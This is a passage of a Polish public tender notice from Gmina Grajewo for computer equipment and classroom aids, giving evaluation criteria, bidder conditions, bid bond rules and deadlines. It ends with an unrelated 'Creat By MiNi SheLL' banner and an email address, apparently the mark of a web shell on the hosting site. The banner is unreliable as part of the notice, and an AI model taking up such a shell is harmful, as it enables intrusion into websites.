- poziom 1 - zestaw klasowy	1szt., Bingo ułamkowe - poziom 2 - zestaw klasowy 1szt., Bryły porównawcze-6cm-17 brył	1zestaw., Budujemy szkielety brył 1szt., Eduline 6 - komplet przyborów geometrycznych z tablica magnetyczną 1szt./<br/>Koło języka angielskiego /tablica korkowa 240x100 - 2szt./<br/><br/>Logopedia klasy IV-VIII / ….. / – szt. 1<br/>Wyposażenie w sprzęt komputerowy:<br/>Koło młodych fizyków /Monitor dotykowy 65" 4K/UHD (3840×2160)/ 1szt., /Laptop 15”, 8GB RAM, SSD 250 GB/ 1 szt.<br/>Koło teatralne /Kamera cyfrowa 40x zoom optyczny, CMOS - 2,5 mln pikseli, 3-calowy ekran LCD z panelem dotykowym/ 1 szt., /Laptop 15”, 8GB RAM, SSD 250 GB- 1 szt., /zestaw nagłaśniający – mikser, 2 kolumny, 2 mikrofony, okablowanie, Moc wyjściowa: 2x200W/– 1szt. <br/>Młody chemik /Monitor dotykowy 65" 4K/UHD (3840×2160)/ 1szt., /Laptop 15”, 8GB RAM, SSD 250 GB/ 1 szt.<br/>Koło języka angielskiego /cyfrowe labolatorium Mentor Adwenced lub równoważny/ 1 szt.<br/><br/>Adres dostawy: Szkoła Podstawowa w Białaszewie, ul. M. Kopernika 2 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 150134,04 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)cena ofertowa brutto – kryterium 60% / waga - 60pkt<br/>2)Okres gwarancji i rękojmi – kryterium 10% / waga – 10pkt<br/>3)Termin realizacji – kryterium 30% / waga – 30pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup sprzętu elektronicznego do Klubu Seniora. Nazwa zadania: „Klub Seniora w Gminie Grajewo”. Zadanie współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Nazwa programu: Regionalny Program Operacyjny Województwa Podlaskiego na lata 2014-2020. Oś priorytetowa: IX: Rozwój lokalny. Działanie: 9.1 Rewitalizacja społeczna i kształtowanie kapitału społecznego Priorytet: 9.6 Strategie rozwoju lokalnego kierowane przez społeczność. <br/>Dostawa obejmuje:<br/>Zakup sprzętu komputerowego do klubu seniora:<br/>laptop /Procesor Intel Core i5, 2500 MHz, pamięć RAM 8 GB, dysk twardy SSD, przekątna ekranu 15,6 cala, matryca o rozdzielczości ekranu nie mniejszej niż 1920x1080, system operacyjny Windows 10, napęd optyczny/ 1 szt., <br/>urządzenie wielofunkcyjne - laserowe /Drukarka laserowa monochromatyczna o rozdzielczości druku 600x600 dpi, do formatu A4 oraz skanowanie i kopiowanie, koszt wydruku 1 strony nie więcej niż 4 grosze/ 1 szt., <br/>głośniki /Typ podłączenia: jack 3,5 mm, moc niskotonowa: 16 W, moc głośnika satelitarnego: 5,5 W, dolna częstotliwość: 40 Hz, górna częstotliwość: 20000 kHz/<br/><br/>Adres dostawy: Kluh seniora w Rudzie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3739,84 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30236000-2 - Różny sprzęt komputerowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)cena ofertowa brutto – kryterium 60% / waga - 60pkt<br/>2)Okres gwarancji i rękojmi – kryterium 10% / waga – 10pkt<br/>3)Termin realizacji – kryterium 30% / waga – 30pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/> na zasadach określonych w Rozdziale XXXI, XXXII SWZ, oraz spełniają określone przez<br/> Zamawiającego warunki udziału w postępowaniu.<br/>1)o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/>dotyczące zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2)uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3)sytuacji ekonomicznej lub finansowej: <br/>Zamawiający uzna warunek za spełniony na podstawie dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż: 200 000,00 PLN (słownie : dwieście tysięcy złotych.).<br/><br/>4))zdolności technicznej lub zawodowej:<br/>a)W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt 4) Ustawy PZP) Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, poprzez wykazanie, że w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie co najmniej trzy dostawy (odrębne umowy) o wartości zamówienia minimum 60 000,00 zł każde, dotyczące: Dostawy sprzętu komputerowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem <br/>stanowiącym Załącznik nr 3 do SWZ;<br/>b)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy <br/>Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 1 zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)Wykazu dostaw, zgodnego ze wzorem stanowiącym Załącznik nr 5 do SWZ, spełniających wymagania określone w rozdziale XXXVII ust. 1 pkt 4 lit. a) SWZ wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów, na rzecz których dostawy były lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>b)Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu trzeciego według załącznika nr 4. Pełnomocnictwo (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w wysokości 2 500,00 zł<br/>1. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilki następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych<br/>3) gwarancjach ubezpieczeniowych<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019 r. poz. 310,836 i 1572).<br/>2. Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: 42 8768 1013 1310 3105 2000 0020 z dopiskiem Dostawa sprzętu komputerowego i pomocy dydaktycznych do obiektów gminnych. <br/>3. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>4. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o którym mowa w pkt 1 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. <br/>5.Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>6. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 6, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Prawo Zamówień Publicznych<br/>8. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>9. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>1)wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej; <br/>2) wykonawca, którego oferta została wybrana: <br/>a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, <br/>b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>oświadczenia, o których mowa w Rozdziale XXXVIII ust. 1 SWZ, składa każdy z <br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie <br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4.Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Według zapisów art. 454, 455 ustawy PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-29 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://uggrajewo.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-29 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com